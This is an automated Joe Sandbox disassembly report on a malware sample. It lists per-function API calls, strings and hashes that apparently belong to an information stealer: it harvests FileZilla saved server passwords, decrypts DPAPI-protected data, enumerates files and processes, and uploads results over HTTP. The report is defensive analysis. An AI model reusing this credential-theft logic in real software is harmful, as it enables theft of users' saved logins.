Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 29f8f4645952d67dce6854253d48bac115f27aa08fd6dc738513443c43b80bf1
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: a1db220857ba2c5b91b5bb2b77c55690ff585134261d2f0361b5e5f31dc33725
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: beeb6b8bc2ff9e49012fe50a97a9a25f54ee3440c521a047357208b641dc3e01
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

CloseHandle.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 843c6556a2d21126533c8f143eda47aec1184c8e5a4ac15968d741abdee82b8b
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02D78288,00000000,?,0041D758,00000000,?,00000000,00000000,?,02D78900,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,02D755D8,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

profile: null, xrefs: 0040EDA8
browser: FileZilla, xrefs: 0040ED99
password: , xrefs: 0040EE3B
<Pass encoding="base64">, xrefs: 0040EC9A
url: , xrefs: 0040EDB7
<Port>, xrefs: 0040EC06
<User>, xrefs: 0040EC50
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
login: , xrefs: 0040EE0A
<Host>, xrefs: 0040EBBC

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: f61a0a8ac0e376edc301393d108ce5b5714eb9167b63e20ed43b5770ef7cfe15
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,02D36D70), ref: 00415F11
GetProcAddress.KERNEL32(75900000,02D36CF8), ref: 00415F2A
GetProcAddress.KERNEL32(75900000,02D36DA0), ref: 00415F42
GetProcAddress.KERNEL32(75900000,02D36D10), ref: 00415F5A
GetProcAddress.KERNEL32(75900000,02D36D28), ref: 00415F73
GetProcAddress.KERNEL32(75900000,02D755C8), ref: 00415F8B
GetProcAddress.KERNEL32(75900000,02D5EBB0), ref: 00415FA3
GetProcAddress.KERNEL32(75900000,02D5E930), ref: 00415FBC
GetProcAddress.KERNEL32(75900000,02D759C8), ref: 00415FD4
GetProcAddress.KERNEL32(75900000,02D759F8), ref: 00415FEC
GetProcAddress.KERNEL32(75900000,02D75890), ref: 00416005
GetProcAddress.KERNEL32(75900000,02D75A28), ref: 0041601D
GetProcAddress.KERNEL32(75900000,02D5ECD0), ref: 00416035
GetProcAddress.KERNEL32(75900000,02D75938), ref: 0041604E
GetProcAddress.KERNEL32(75900000,02D75950), ref: 00416066
GetProcAddress.KERNEL32(75900000,02D5EA70), ref: 0041607E
GetProcAddress.KERNEL32(75900000,02D75800), ref: 00416097
GetProcAddress.KERNEL32(75900000,02D759B0), ref: 004160AF
GetProcAddress.KERNEL32(75900000,02D5EA50), ref: 004160C7
GetProcAddress.KERNEL32(75900000,02D758F0), ref: 004160E0
GetProcAddress.KERNEL32(75900000,02D5ED10), ref: 004160F8
LoadLibraryA.KERNEL32(02D75968,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(02D75830,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(02D75A40,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(02D75848,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(02D75980,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75070000,02D75A58), ref: 00416172
GetProcAddress.KERNEL32(75FD0000,02D75860), ref: 00416193
GetProcAddress.KERNEL32(75FD0000,02D75878), ref: 004161AB
GetProcAddress.KERNEL32(75A50000,02D758A8), ref: 004161CD
GetProcAddress.KERNEL32(74E50000,02D5E970), ref: 004161EE
GetProcAddress.KERNEL32(76E80000,02D75498), ref: 0041620F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,02D75608,?,02D795A8,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02D75638,00000000,?,02D31B60,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 004052EF
--, xrefs: 00404F34
", xrefs: 004053BA
", xrefs: 00405136
", xrefs: 00405278
------, xrefs: 00404F4B
------, xrefs: 004051AD
------, xrefs: 0040506B

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

